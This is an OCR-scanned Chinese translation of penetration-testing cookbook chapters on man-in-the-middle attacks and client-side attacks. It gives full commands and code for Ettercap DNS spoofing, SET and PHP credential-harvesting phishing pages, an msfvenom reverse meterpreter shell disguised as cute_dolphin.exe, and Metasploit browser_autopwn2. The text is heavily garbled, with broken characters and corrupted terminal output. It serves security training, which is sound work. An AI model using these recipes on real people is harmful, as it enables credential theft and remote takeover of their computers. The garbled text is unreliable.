。 -k 和 oc : 这 用 于 指明 和 充当 CA 时 ，SSLSplit 所 使 用 的 私 钥 和 证 书 。 


e ssl 0.0.0.0 8443 : 这 告诉 SSLSplit 在 哪里 监听 HTTPS (或 者 其 它 加 密 协 议 ) 连接 。 
要 记 住 这 是 我 们 在 上 一 章 中 使 用 iptables 从 443 转发 的 接口 。 


e tcp 0.0.0.0 8080 : 这 告诉 SSLSplit 在 哪里 监听 HTTP 连接 。 要 记 住 这 是 我 们 在 上 一 章 
中 使 用 iptables 从 80 转发 的 接口 。 
在 执行 这 些 命令 之 后 ， 我 们 等 待 客 户 端 浏览 器 服务 器 的 HTTPS 页 面 并 提交 数据 ， 之 后 我 们 检 
查 日 志文 件 来 发 现 未 加 密 的 信息 。 


22 > 、 、 MORE 
8.6 执行 DNS kn EAE 

DNS 欺骗 是 一 种 攻击 ， — MITM 攻击 的 攻击 者 使 用 它 来 修改 响应 受害 者 的 DNS 服务 
器 中 的 名 称 解 析 ， 发 送 给 他 们 恶意 页 面 ， 而 不 是 他 们 请 求 的 页 面 ， 但 仍然 使 用 有 效 名 称 。 
这 个 秘籍 中 ， 我 们 会 使 用 Ettercap 来 执行 DNS 坎 骗 攻击 ， 并 在 受害 者 打算 浏览 别 的 网 站 
时 ， 使 其 浏览 我 们 的 网 站 。 

准备 

对 于 这 个 秘籍 ， 我 们 需要 使 用 我 们 的 Windows 客户 端 虚 拟 机 ， 但 是 这 次 网 络 识别 器 桥接 到 
DNS 解析 中 。 这 个 秘籍 中 它 的 IP 地 址 为 192.168.71.14 » 


攻击 者 的 机 器 是 我 们 的 Kali 主机 ，IP 为 192.168.71.8。 它 也 需要 运行 Apache 服务 器 ， 并 拥 
有 index.html 演示 页 面 ， 我 们 会 包含 下 列 东 西 : 


<h1>Spoofed SITE</h1> 


操作 小 


1. 假设 我 们 已 经 启动 了 Apache 服务 器 ， 并 正确 配置 了 伪造 页 面 ， 让 我 们 编 
辑 /etc/ettercap/etter.dns ， 使 它 仅 仅 包 含 下 面 这 一 行 : 


* A 192.168.71.8 


我 们 仅仅 设置 一 条 规则 : 所 有 A 记 录 (地 址 记录 ) 都 解析 到 192.168.71.8 ， 这 是 我 们 
Kali 的 地 址 。 我 们 可 以 设置 其 他 条 目 ， 但 是 我 们 打算 在 这 里 避免 干扰 。 


2， 这 次 ， 我 们 从 命令 行 运 行 Ettercap。 打 开 root 终端 并 键入 下 列 命 


ettercap -i wlanO -T -P dns spoof -M arp /192.168.71.14/// 


以 文本 模式 运行 Ettercap， 并 开启 DNS 欺骗 插件 来 执行 ARP 欺骗 攻击 ， 目 标 仅 仅 


会 
设置 为 192.168.71.14 ? 


$ sudo attercap 1 wlan TT "EE a1 spoof = F] arp 


ettercap 8.8.2 copyright 2001-2015 Ettercap Development Team 


Listening | on: 


152. 168 F z 255, Fis - 1 C 


192. 168.71. 8/255; 255255.0 


SSL dissection needs a valid 'redir command on' script in the ett 
Ettercap might not work correctly. /proc/sys/net/ ipv6/conf / 本 本 US Se 1s not se 
Privileges dropped t | EUID 65534 EGID 65534... 


33 plugins 
42 protocol diss 
57 ports monitored 
20388 mac vendor fingerprint 
1766 tcp OS fingerprint 
21B2 known services 
Lua: No scripts were specitied, nat starting up! 


Random z ing 255 Tu s scanning. 
scanning the ， 1i ask for 2595 "i — "" 
- - - - 100.00 95$ 





3. 局 动 攻击 之 后 ， 我 们 来 到 客户 端 主 机 ， 并 尝试 通过 网 站 自己 的 域名 来 浏览 网 站 ， 例 


如 ， www.yahoo.com ， 像 这 样 





e http://www.yahoo.com/ - Windows Internet Explorer 


QU E NELE yahoo.com - 
ud Favorites 73 [9] Suggested tes w B| Neh Slice Gallery Y 


& http://www.yahoo.com/ C Bi: 


spoofed SITE 


r3 
E d 
P 








要 注意 ， 现 在 地 址 和 标签 栏 显示 原始 站 点 的 名 称 ， 但 是 内 容 来 自 不 同 的 地 方 。 


4. 我 们 也 可 以 党 会 使 用 nslookup 执行 地 址 解析 ， 像 这 


;sUsers*MI EUser?nslookup www.microsoft.com 
Jerver: UnKnown 
Address: 192.168.71.i 


ame =: e10088 .dspb.akamaiedge.net 
Addresses: ZƏBİ:428 :2004:172::2768 
ABHI :428 : 2004:1062: ArbY 
192.168.71.8 
iliases: www.microsoft.com 
toggle .wwuw.ms .-akadns.net 
uww.microsoft.com-c.edqekeuy.net 
www .microsoft .com-~c -edgekey.-net .globhbalredir.akadns .net 


G:\Users\IEUser>ns lookup wuw. yahoo.com 
erver: UnKnown | 
ddress: 192.168.71.1 


lame : f d- fpi. ugi .b. yahoo. com 

Addresses: ZOBI :4790 : 44:204: 
2881 : 4998:58: cü2::a9 
192.168.71.8 


Aliases: www.yahoo.com 





工作 原理 


这 个 秘籍 中 ， 我 们 看 到 如 何 使 用 中 间 人 攻击 来 强制 用 户 浏 览 茶 个 页 面 ， 他 们 甚至 相信 自己 在 
其 它 站 点 上 。 


在 第 一 步 中 ， 我 们 修改 了 Ettercap 的 名 称 解析 文件 ， 让 它 将 所 有 请 求 的 名 称 重 定向 到 我 们 的 
Kali 主机 ° 


后 ， 我 们 以 下 列 参 数 运 行 Ettercap : -iwlang -T -P dns spoof -M arp /192.168.71.14/// ° 


e iwan : 要 技术 我 们 需要 客户 端 进 行 DNS 解析 ， 所 以 我 们 需要 让 它 连 接 到 桥接 的 适 
Bez : HARNA Kali 主机 ， 所 以 我 们 将 嗅 探 接口 设 为 wab (攻击 者 计算 机 上 的 无 
AMT) 


-T :使 用 纯 文本 界面 。 


e -p dns spoof : Æ Zi DNS 欺骗 插件 。 
e marp : dA £i ARP 欺骗 攻击 。 


e /192.168.71.14/// : 这 是 我 们 在 命令 行 中 对 Ettercap 设置 目标 的 方 
AX : MAC/ip address/port 。 其 中 // 表示 任何 对 应 IP 192.168.71.14 (客户 端 ) 任何 端 
口 的 MAC 地址 。 


， 我 们 确认 了 攻击 能 够 正常 工作 。 


j IL 


3 3 — ^ 3ESR SE 8 889 E] T OE AREE x 89 T. o” | dnsspoof 。 你 应 该 下 载 下 来 并 加 入 工 
RE: 


man dnsspoof 


http://www.monkey.org/-dugsong/dsniff/ 


另 一 个 值得 提 及 的 工具 征 中 间 人 攻击 框架 : MITMf。 它 包含 内 建 的 ARP XU ^ DNS 坎 骗 、 
WPAD 代理 服务 颈 ， 以 及 其 它 攻击 类 型 的 功能 。 


mitmf --help 


第 九 章 客户 端 攻击 和 社会 工程 


作者 : Gilberto Najera-Gutierrez 
译 者 : 飞龙 


协 仅 : CC BY-NC-SA 4.0 


简介 


我 们 目前 所 见 的 大 部 分 技巧 都 尝试 利 用 服务 端的 漏洞 或 设计 缺陷 ， 并 访问 它 来 从 数据 库 中 提 
取 人 信息。 有 另外 一 种 攻击 ， 使 用 服务 器 来 利用 用 户 软 件 上 的 漏洞 ， 或 者 尝试 其 骗 用 户 来 做 一 
些 他 们 通常 情况 下 不 会 做 的 事情 ， 以 便 获 得 用 户 拥 有 的 信息 。 这 些 攻 击 就 叫做 客户 端 攻击 。 


这 一 章 中 ， 我 们 会 复查 一 些 由 攻击 者 使 用 ， 用 于 从 客户 端 获得 信息 的 技巧 ， 通 过 社会 工程 、 
次 骗 或 利用 软件 漏洞 。 


虽然 它 并 不 和 Web 应 用 渗透 测试 特定 相关 ， 我 们 会 涉及 它们 ， 因 为 大 多 数 都 是 基于 web 
E E A PUE ER RUNS S 
了 解 攻 击 者 如 何 执行 这 类 攻击 ， 对 于 渗透 测试 者 来 说 非常 重要 。 


9.1 使 用 SET 创建 密码 收集 器 


社会 工程 攻击 可 能 被 认为 是 客户 端 攻 击 的 特殊 形式 。 在 这 种 攻击 中 ， 攻 击 者 需要 说 服用 户 ， 
相信 攻击 者 是 可 信任 的 副本 ， 并 且 有 权 接 收 用 户 拥有 的 一 些 信息 。 


SET 或 社会 工程 工具 包 ( https://www.trustedsec.com/social-engineertoolkit/ ) 是 一 套 工 
具 ， 为 执行 针对 人 性 的 攻击 而 设计 。 这 类 攻击 ， 包 括 网 络 钓 鱼 、 邮 件 群 发 、SMS、 伪 造 无 线 
接 入 点 、 恶 意 网 站 、 感 染 性 媒体 ， 以 及 其 它 。 


这 个 秘籍 中 ， 我 们 会 使 用 SET 来 创建 客 码 收集 器 网 页 ， 并 看 看 它 如 何 工作 ， 以 及 攻击 者 如 何 
使 用 它 来 盗 取 用 户 密码 。 


操作 小 
1. 在 root 终端 中 输入 下 列 命令 


setoolkit 


The Social-Engineer Toolkit 1s a product of TrustedSsec. 


Visit: https:/ /www.trustedsec.com 


select from the menu: 


Social- rng ne 
Fast-Track Penetration Testing 
Third Party Modules 

Update the Social-Engineer Toolkit 
Update SET configuration 

Help, Credits, and About 


E 


OY U b QN e 


Exit the Social-Engineer Toolkit 





2. 在 set» 提示 符 中 输入 1 ( Social-Engineering Attacks ) 并 按 下 回 车 。 

3. 现在 选择 website Attack Vectors (选项 2 ) ° 

4， 从 下 面 的 菜单 中 ， 我 们 选择 Credential Harvester Attack Method (选项 3 ) 。 
5， 选 择 site Cloner (选项 2 ) 。 


6. 它 会 询 中 IP address for the POST back in Harvester/Tabnabbing ° 它 的 意思 是 收集 到 的 
证 书 打 算 发 送 到 哪个 IP。 这 里 ， 我 们 输入 Kali 主机 在 vboxnet6 中 的 IP 192.168.56.1 ° 


7. 下面， 压 脚 询问 要 克隆 的 URL， 我 们 会 从 vulnerable vm 中 克隆 Peruggia 的 登录 表单 。 


输入 http://192.168.56.102/peruggia/index. php?action-login ° 


8. 现在 会 开始 克隆 ， 之 后 你 会 被 询问 是 否 SET 要 开启 Apache 服务 器 ， 让 我 们 这 次 选 
择 ves ， 输 入 y 并 按 下 回 车 。 


| Credential harvester will allow you to utilize the clone capabilities within SET 
| to harvest credentials or parameters from a website as well as pl ace them into a report 
-] This option is used for what IP the server will POST to. 
| If you're using an external IP, use your external IP for tms 
i icc» IP address for the POST back in Harvester/Tabnabbing:192.168.56.1 
SET supports both HTTP and HTTPS 
Example: http://www. thisisafakesite,.com 
> Enter the url to clone:http://192.168.56.102/bodgeit/login.]s 


-loning the webs ite: ht tp: 152.168.56.102/bodgeit/login.]jsp 
] This could take a littl bit — 


Li | I " 
E 二 


che webserver 1s set to OM. Copying over PHP file to the website. 
a note that all output from the harvester will be found under ap 
free to customize post.php in the /var/www/html directory 
LL files have been copied to /var/www/html 
return to continue) 





9， 再 次 按 下 回 车 。 


10. 让 我 们 测试 一 下 页 面 ， 访 问 http://192.168.56.1/ ? 


11. 


12. 


13. 


14. 


Peruggia 1.2 x 


Peruggia 1.2 








Welcome Guest | Login | Home | About | Learn 








Login 


Username: | ] 


Password: | | 





Login | 





Peruggia 1.2 | httpsz//sourceforge.net/projects/peruggia/ 
Developed by Andrew Kramer 


现在 我 们 拥有 原始 登录 页 面 的 一 份 精 确 副 本 。 


现在 在 里 面 输入 一 些 用 户 名 和 客 码 ， 并 点 击 Login 9 Xf] X X harvester/test 


Oo 


你 会 看 到 页 面 重 定向 到 了 原始 的 登录 页 面 。 现 在 ， 来 到 终端 并 输入 收集 器 文件 保存 的 目 


x o RUA Kali 中 的 /var/www/ html 


cd /var/www/html 


这 里 应 该 有 名 称 为 harvester [date and timel.txt 的 文件 。 
内 


容 ， 我 们 会 看 到 所 有 捕获 的 信息 : 


> 


显示 它 的 


s 


cat harvester_2015-11-22 23:16:24.182192.txt 


E cd /var/www/html/ 


m x 
ae 


html£ cat harvester 2015-11-22 i 


Array 
( 
ETE 
[password 


这 就 结束 了 ， 我 们 仅仅 需要 将 连接 发 送 给 我 们 的 目标 ， 并 让 他 们 访问 我 们 的 伪造 
面 ， 来 收集 它们 的 密码 。 


XK 


AL 





工作 原理 


SET 在 克隆 站 点 的 时 候 会 创建 三 个 文件 : 首先 是 index.html ， 这 是 原始 页 面 的 副本 ， 并 包含 
登录 表单 。 如 果 我 们 查看 SET 在 我 们 的 Kali 中 的 /var/www/html 创建 的 index.html 的 代 
码 ， 我 们 会 发 现下 面 的 代码 : 


«form actionz"http://192.168.56.1/post.php" method-zpost» 
«br» 

Username: «input type-text name-username»«br» 

Password: «input type-password name-password»«br» 
«br»«input type=submit value=Login><br> 

«/form» 


这 里 我 们 可 以 看 到 H 给 了 192.168.56.1 (我 们 的 Kali 主机 ) 的 post.php ， 
这 是 SET 创建 的 第 二 个 文件 。 这 个 文件 所 做 的 所 有 事情 就 是 读 取 POST 请 求 的 内 容 并 将 它们 
写 入 harvester [date and time}.txt 3 fF » SET 所 创建 的 第 三 个 文件 储存 由 用 户 提 交 的 信 
息 。 在 向 文件 中 写 入 数据 之 后 ， «meta» 标签 重 定向 到 原始 的 登录 页 面 ， 所 以 用 户 会 认为 他 们 
PT MD RHONE 


<?php 

$file = 'harvester 2015-11-22 23:16:24.182192.txt'; 
file_put_contents($file, print_r($_POST, true), FILE_APPEND); 
?> 

«meta http-equiv-"refresh" content-z"0; 
url-http://192.168.56.102/peruggia/index.php?action-login" 
/> 


9.2 使 用 之 前 保存 的 页 面 来 创建 钓鱼 网 站 


在 之 前 的 秘籍 中 ， 我 们 使 用 了 SET 来 复制 网 站 并 使 用 它 来 收集 密码 。 有 了 时候， 仅仅 复制 登录 

面 不 会 对 高 级 用 户 生 效 ， 在 正确 输入 锋 码 并 再次 重 定向 登录 页 面 时 ， 它 们 可 能 会 产生 怀 
疑 ， 或 者 会 试 着 浏览 页 面 中 的 其 它 链 接 。 我 们 这 样 就 会 失去 它们 ， 因 为 它们 会 离开 我 们 的 页 
面 而 来 到 原始 站 点 。 


这 个 秘籍 中 ， 我 们 会 使 用 我 们 在 第 三 章 “ 为 Wget 离线 分 析 下 载 页 面 "秘籍 中 复制 的 页 面 ， 来 构 
建 更 加 详细 的 钓鱼 网 站 ， 因 为 它 几乎 含有 所 有 导航 ， 并 且 会 在 捕获 证 书 之 后 登陆 原始 站 点 。 


准备 
我 们 需要 保存 Web 页 面 ， 遵 循 第 三 章 “ 为 Wget 离线 分 析 下 载 页 面 "秘籍 。 简 单 来 说 ， 可 以 通 
过 下 列 命 令 来 完成 : 


wget -r -P bodgeit offline/ http://192.168.56.102/bodgeit/ 


E’ BA IPIE bodgeit offline A xk P ° 


TRE y JR 
1. 第 一 步 是 将 下 载 的 站 点 复制 到 Kali 中 APache 的 根 目 录 。 在 root 终端 中 : 


cp -r bodgeit offline/192.168.56.102/bodgeit /var/www/html/ 


2. 之 后 我 们 启动 Apache 服务 : 


service apache2 start 


3. 下 面 ， 我 们 需要 更 新 我 们 的 登录 页 面 ， 使 它 重 定向 我 们 收集 密码 的 脚本 。 打 
开 bodgeit 目录 ( / var/www/html/bodgeit ) 中 的 login.jsp 文件 并 寻找 下 面 的 代码 


«h3»Loginc/h3» 
Please enter your credentials: «br/»«br/» 
«form method= POST > 


4. 现在 ， 在 表单 标签 中 添加 action 来 调用 post.php 


«form method="POST" action-"post.php"» 


D. 我 们 需要 在 login.jsp 的 相同 目录 下 创 E 文件 ， 创建 post.php ? 带 有 下 列 代 码 


<?php 

$file = 'passwords COOkbO0O0k.txt'; 

file_put_contents($file, print_r($_POST, true), FILE_APPEND); 
$username=$_POST["username"]; 

$password=$_POST["password"]; 

$submit="Login"; ?> 

<body onload="frm1.submit.click()"> 

<form name="frm1" id="frm1" method="POST" 
action="http://192.168.56.102/bodgeit/login.jsp"> 

<input type="hidden" value="<?php echo $username;?>" name ="username"> 
<input type="hidden" value="<?php echo $password;?>" name ="password"> 
<input type="submit" value="<?php echo $submit;?>" name ="submit"> 
</form> 

</body> 


6， 你 可 以 看 到 ， 密 码 会 保存 到 passwords cookbook.txt 。 我 们 需要 创建 这 个 文件 来 设置 合理 
的 权限 。 在 root 终端 中 访问 /var/www/html/bodgeit ， 并 输入 下 列 命令 : 


touch passwords COOkbOOk.txt 
chown www-data passwords COOkbOOk.txt 


要 记 住 Web 服务 器 运行 在 www-data 用 户 下 ， 所 以 我 们 需要 使 这 个 用 户 为 文件 的 所 有 
者 ， 便 于 它 可 被 Web 服务 器 进程 写 入 。 


7. 现在 ， 是 时 候 让 受害 者 访问 这 个 站 点 了 ， 假 设 我 们 让 用 户 访问 
了 http://192.168.56.1/bodgeit/login.jsp ， 打 开 浏 览 器 并 访问 它 。 


8. 使 用 一 些 有 效用 户 信息 填充 登录 表单 ， 对 于 这 个 秘籍 我 们 会 使 


用 userQ mail.com/password ? 
9. Ait Login ° 


1 i7 978 m 二 r- gg Y gx 
d r) 192. 1658.55.10 





The Bodgelt Store 


We bodge it, so you dont have to! User: usericematil.com 
Home About Us Contact Us Logout Your Basket search 
Doodahs 
Gizmos You have logged in successfully: usertemail.com 
Ihingamaliqs 
Thingies 
Whatchamacallits 
Whatsits 
yvidgets 











它 看 起 来 能 正 第 工作 ， 我 们 现在 成 功 登 录 了 192.168.56.102 ° 


10. 让 我 们 检查 获 码 文件 ， 在 终端 中 输入 : 


cat passwords COOKkbOOk.txt 


1t# cat passwords COOk 





并 且 ， 我 们 得 到 它 了 。 我 们 捕获 了 用 户 的 均码 ， 将 它们 重 定向 到 正 第 
& 。 


= 
E 
fà 
2 
q 
èd 
a: 


工作 原理 


这 个 秘籍 中 ， 我 们 使 用 了 站 点 副本 来 创建 密码 收集 器 ， 并 使 它 更 加 可 信 ， 我 们 使 脚本 执行 原 
始 站 点 的 登录 。 


在 前 三 步 中 ， 我 们 简单 设置 了 Web 服务 器 和 它 要 展示 的 文件 。 下 面 ， 我 们 创建 了 密码 收集 器 
脚本 post.php : 前 两 行 和 之 前 的 秘籍 相同 ， 它 接受 所 有 POST 参数 并 保存 到 文件 中 。 


$file = 'passwords COOkbOOk.txt'; 
file put contents($file, print r($ POST, true), FILE APPEND); 


之 后 我 们 将 每 个 参数 储存 到 变量 中 : 


$username-$ POST["username"]; 
$password-$ POST["password"]; 
$submit-"Login"; 


因为 我 们 的 登录 不 打算 依赖 于 用 户 发 送 的 正确 值 ， 我 们 设置 $submit-"Login" 。 下 面 ， 我 们 创 
建 了 HTML 主题 ， 它 包含 一 个 表单 ， 在 页 面 加 载 完 毕 后 会 目 动 发 
iÉ username ， password 和 submit 值 到 原始 站 点 。 


«body onload="frm1.submit.click()"> 

«form name="frmi" id="frm1" method="POST" 
actionz"http://192.168.56.102/bodgeit/login.jsp"» 

«input type="hidden" valuez"«?php echo $username;?>" name = USsername > 
«input type="hidden" valuez"«?php echo $password;?»" name ="password"> 
«input type="submit" value="<?php echo $submit;?»" name ="submit"> 
«/form» 

</body> 


要 注意 ， body 中 的 onload 事件 并 不 调用 frmi.submit() 而 是 frmi.submit. click() ° 3X E] 
为 当 我 们 使 用 submit 作为 表单 元 素 的 名 称 时 ， 表 单 中 的 submit() SX AGE UOCE E xd 

(这 里 是 提交 按钮 ) 。 我 们 并 不 打算 修改 按钮 名 称 ， 因 为 它 是 原始 站 点 需要 的 名 称 。 所 以 我 

们 使 submit 变 成 一 个 按钮 ， 而 不 是 隐藏 字段 ， 并 使 用 它 的 click 函数 将 值 提交 到 原始 站 点 。 
我 们 同时 将 表单 中 的 字段 值 设 置 为 我 们 之 前 用 于 储存 用 户 数 据 的 变量 值 。 


9.3 使 用 Metasploit 创建 反 向 shell 并 捕获 连接 


当 我 们 执行 客户 端 攻击 的 时 候 ， 我 们 能 够 其 骗 用 户 来 执行 程序， 并 使 这 些 程序 连接 回 控 制 


p> 


端 。 
这 个 秘籍 中 ， 我 们 会 了 解 如 何 使 用 Metasploit 的 msfvenom 来 创建 可 执行 程序 〈 反 向 
meterpreter shell) ， 它 会 在 执行 时 连接 我 们 的 Kali 主机 ， 并 向 我 们 提供 用 户 计 算 机 的 控制 。 
TR TE 2v JE 

首先， 我 们 要 创建 我 们 的 shell» Æ Kali 中 打开 终端 并 执行 下 列 命 


msfvenom -p windows/meterpreter/reverse tcp LHOST-192.168.56.1 LPORT-4443 -f exe > 
cute dolphin.exe 


这 会 创建 名 为 cute dolphin.exe 的 文件 ， 这 是 反 向 meterpreter shell， 反 向 意味 着 它 会 连 
接 回 我 们 ， 而 不 是 监听 我 们 的 连接 。 


2. 下面 ， 我 们 需要 为 我 们 “可 爱 的 海豚 ”将 要 创建 的 连接 建立 监听 器 。 在 MSFconsole 的 终端 
中 : 


use exploit/multi/handler 

set payload windows/meterpreter/reverse tcp 

set lhost 192.168.56.1 set lport 4443 

set ExitOnSession false 

set AutorunScript post/windows/manage/smart migrate 
exploit -j -z 


就 像 你 看 到 的 那样 ，LHOST 和 RPORT 是 我 们 用 于 创建 exe 文件 的 东西 。 这 是 程序 将 要 
连接 的 IP 地 址 和 TCP 端口 。 所 以 我 们 需要 在 这 个 Kali 的 网 络 接口 和 端口 上 监听 。 

我 们 的 Kali 已 准备 就 绪 ， 现 在 是 准备 攻击 用 户 的 时 候 了 ， 我 们 以 root 启动 Apache 服务 

并 运行 下 列 代 码 : 


service apache2 start 


之 后 ， 将 恶意 文件 复制 到 web 服务 器 文件 夹 内 。 


cp cute dolphin.exe /var/www/html/ 


假设 我 们 使 用 社会 工程 并 使 我 们 的 受害 者 相信 这 个 文件 是 需要 执行 来 获得 一 些 好 处 的 东 
西 。 在 Windows 4 P 35 EE JU JU P] > i2 IP] http://192.168.56.1/cute dolphin.exe ° 


你 会 被 询问 下 载 还 是 运行 这 个 文件 ， 出 于 测试 目的 ， 选 择 Run (运行 ) ， 再 被 询问 时 ， 
骨 次 选择 Run ° 


现在 ， 在 Kali MSFCONSOLE 的 终端 中 ， 你 会 看 到 建立 好 的 连接 


: EL | i2, 168, 56, 101: 49158] at 2015-12-06 18:16:08 -0690 
BILE j2.168.56.101:45158) processing AutoRunScript 'post/win du wa manage /smart mgrate 
ur rer At server processa: cute da Lph ALt inti m exe Í 2100) 


m emoting to move into ELI Iu Jun fäi ur [51-1299 
[+] Migr ating to 1500 
"Nu -L-I-RB P EI Lly mı gr ated to process i500 





sessions 


msf exploiti 


Information 





meterpreter x86/win32 IESWin7\IEUser à IEBWIN7 192.168.56.1:4443 -> 192. 168.56. 101:49158 


如 果 我 们 打算 和 会 话 交互 ， 可 以 使 用 .i 选项 ， 带 有 会 话 的 编号 : 


Sessions -i 1 


我 们 会 看 到 meterpreter 的 提示 符 。 现 在 ， 我 们 可 以 请 求 被 入 侵 系 统 的 信息 。 


sysinfo 


I ESWIN/ 

Windows 7 (Build 7601, Service Pack 
x86 

en Us 

WORK GROLIP 


Computer 
OS 
Architecture 


System Language 
Domain 

Logged On Users 
Meterpreter 


EE BE EE EE EE EE EE Í 





11. 或 者 执行 系统 shell。 


shell 


Microsoft Vi nidos [Version 6.1.7601] 


Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
C:\Windows\system32>1pconf1g 
eT 


Windows IP Configuration 


al Area Connection 2 


inde oe b e ai DNS | Suffix 
Link- local CT Add EE feB0::35c5:9a8c:12ea:cf69%13 
DA Address. 
Subnet Mask s 
Default Gateway . . 。 soas sea 


Tunnel adapter isatap.{C262CDA5-7B27-4B5D- A138- Bl 


Media State . . a en E- Media disconnected 
Connection-specitic DNS Suffix 





工作 原理 


Msfvenom 帮助 的 我 们 从 Metasploit 大 量 列 表 中 创建 载 柯 ， 并 且 将 它们 集成 到 许多 语言 的 源 
代码 中 ， 或 者 创建 脚本 和 可 执行 文件 。 就 像 我 们 在 这 个 秘籍 所 做 的 那样 。 我 们 这 里 所 使 用 的 
参数 是 所 使 用 的 载荷 ( windows/ meterpreter/reverse tcp ) 、 连 接 回 来 所 需 的 主机 和 端口 

(LHOST 和 RPORT) ， 以 及 输出 格式 ( -f exe ) 。 将 标准 输出 重 定向 到 文件 来 将 它 保存 


为 cute dolphin.exe ° 


Metasploit 的 exploit/multi/handler 是 个 载荷 处 理 器 ， 这 里 我 们 将 其 用 于 监听 连接 。 在 连接 建 
立 之 后 ， 它 执行 了 meterpreter 载荷 。 


Meterpreter 是 增强 型 的 Metasploit shell。 它 包含 用 于 嗅 探 受害 者 网 络 ， 用 于 将 其 作为 入 口 来 
DATA A E E SOC UMEN 
B. 


9.4 使 用 Metasploit 的 browser autpwn2 xz: € P 35 


Metasploit 框架 包含 客户 端 利 用 的 庞大 集合 ， 许 多 都 为 利用 浏览 器 中 的 已 知 漏洞 而 设计 。 其 中 
有 一 个 模块 能 够 检测 客户 端 所 使 用 的 浏览 器 版 本 ， 并 挑选 最 好 的 利用 工具 来 触发 漏洞 。 这 个 
模块 是 browser. autpwn 和 browser. autpwn2， 后 者 是 最 新 版 本 。 


在 这 个 秘籍 中 ， 我 们 会 使 用 browser autpwn2 执行 攻击 ， 并 将 其 配置 好 来 让 目标 访问 。 


操作 步骤 
1. 启动 MSFCONSOLE 。 


2， 我 们 会 使 用 browser autpwn2 (BAP2) œ 


use auxiliary/server/browser autopwn2 


9. 让 我 们 看 一 看 它 拥 有 什么 配置 项 
show options 


f auxili aryl I > UT options 


Module options (auxilii 


Mame Currer setting Fegurrer or] iP tior 


EXCLUDE PATTERN na Pattern search to exclude specific modules 
T LDE, PATTERN no Pattern search to include specific modules 
na Allow the browser to retry the module 
The local host to listen on. This must be an address on the local 
The local port to listen on. 
Negotiate SSL for incoming connections 
Fath to a custom SSL certificate Ildaefault 1s randomly denerated) 
Thea URIE to use for this exploit deftault 1s random) 


Auxiliary action; 
Mame Descr "Ap 1C 


WebServer Start a poe h of modules and direct clients to appropriate exploits 





4. 我 们 将 Kali 设 为 接受 连接 的 主机 。 


Set SRVHOST 192.168.56.1 


5 之后， 我 们 为 接受 响应 的 服务 器 创建 目录 /kittens ° 


set URIPATH /kittens 


这 个 模块 会 触发 大 量 利 用 ， 包 含 一 些 Android 上 的 。 假 设 我 们 的 攻击 目标 是 PC， 并 不 打 
算 依 赖 于 Adobe Flash 的 授权 。 我 们 会 排除 Android 和 Flash 的 利用 


set EXCLUDE PATTERN android|adobe flash 


我 们 也 可 以 设置 模块 的 高 级 选项 (使 用 show advanced 来 查看 高 级 选项 的 完整 列表 ) ， 来 
pe hgh 


set ShowExploitList true 
set VERBOSE true 


高 级 选项 也 允许 我 们 为 每 个 平台 (Windows ^ Unix 和 Android) 选择 载荷 和 它 的 参数 ， 
例如 LHOST 和 RPORT。 


现在 ， 我 们 已 经 为 执行 利用 做 好 了 准备 。 
run 


mt auxiliaryl | = run 
| Auxiliary module execution completed 


人 BES exploits, please wart. 

maf auxiliary E | Starting exploit modu! 
Starting TETERE. 

[*] Time spent: 5.779500118 
Starting the payload handler... 
Starting the payload handler... 
Starting the pay Load handler... 
Using UPRL: Attpi 192.168.536. 1: o: 民工 七 七 各 月 各 


The following is a list of exploits that BrowserAutoPwn will consider using. 
| Exploits with the highest ranking and newest will be tried first. 


Exploits 


Rank Name Path Baylaad 


Excellent firefox wehidl injection /OsTNmOOT LC f1refax/shel! 

Excellent firefox tostring console injection /oUMVghaJ firefox/shell revers 

Excellent  firefa "RIDE. l ugin Hr "Idm si. 1 fireftox/shel Lren erse E. p on 4442 
Excellent firefox proto crmfrequest ANJLNTxXIJLXdPy firafox/shell_ arae tcn on 4442 


如 果 我 们 打算 触发 特定 的 利用 ， 我 们 可 以 在 服务 器 的 URL 后 面 使 用 path 值 。 例 如 ， 如 
果 我 们 打算 触发 firefox svg plugin ， 我 们 将 http://192.168.56.1/PwrmfJApkwwsf 发 送 给 
受害 者 ， 路 径 在 每 次 模块 运行 时 会 随机 生成 。 





在 客户 端的 浏览 器 中 ， 如 果 我 们 访问 http://192.168.56.1/kittens ， 我 们 会 看 到 BAP2 
立即 响应 ， 并 且 党 试 所 有 合适 的 利用 ， 当 它 成 功 执行 某 个 之 后 ， 它 会 在 后 台 创 建 会 话 : 


request: /UROGTrI MCZ/sAD DEN Onh ybi TE ap 
Sending XAP.. 
lE setn ousecapture_uaf - peee pa cookie 'k gei ] Xk GC 
ecapture uaf . eived cookie 'kqbuDAbY Xx 
acap tura uaf - has nnig exploit | to user 
B Se LmHUS Datti ] 上 E qbUDAbYj Xk am 
le setmaousec - Comparing — emen t: ua names 


: LẸ 1e sSetmousecapture u - bai ing requirement; source 
18 setmousec aptur E a f- 16 101 1e setmo usecap ture uaf - Compar ig requirement: os name 
Lë satmousecaptur TE tu 101 1e setmousecapturse us af : 

工具 -配股 ined ecaptur E af - = FP 156. 35. 101 Le AB tmausec zones af - Com 

]e setmousecapture us zip LOI Pai | it met: ua ver, oftica., F 

adwantech webaccess de getco lor - 2.1 5H. BB ül advantech webaccess dw 


ech advantech webaccass i 


Lompgarrng 
Comparing 

- Lomparzrnzg i 
Comparing 


is Comparing 
ET» [^] an nis ih ER. a TE La Ta e - dws E - 
| 192.168.55.10] EE ch. Nl LT dwa gëtcola cemdinag Ady ai cias WebAccess d 





工作 原理 


Browser Autopwn 会 建立 带 有 主页 的 Web 服务 器 ， 并 使 用 JavaScript 来 识别 客户 端 运行 了 什 
么 软件 ， 并 基于 它 选择 合适 的 利用 来 尝试 


这 个 秘籍 中 ， 我 们 设置 了 Kal 主机 ， 使 其 为 kittens 目录 的 请 求 监听 8080 端口 。 我 们 所 配 
置 的 其 它 请 求 是 : 


e “EXCLUDE_PATTERN : 告诉 BAP2 排除 (不 加 载 ) Android 浏览 器 或 Flash 插件 的 利用 
e ShowExploitList : 展示 BAP2 运行 时 已 加 载 的 利用 


e VERBOSE : 告诉 BPA2 显示 更 多 信息 ， 关 于 加 载 了 什么 ， 加 载 到 哪里 ， 每 一 步 都 发 生 了 
什么 


之 后 ， 我 们 只 需要 运行 模块 并 使 一 些 用 户 访问 我 们 的 /kittens 站 点 


9.5 使 用 BeEF x 


amaa ' 我 们 看 到 了 BeEF (2) ERRAR) 能 够 做 什么 。 这 个 秘籍 中 ， 我 们 会 使 
它 来 发 送 而 已 浏览 器 扩展 ， 当 它 执行 时 ， 会 向 我 们 提供 绑 定 到 系统 的 远程 shell 。 


准备 
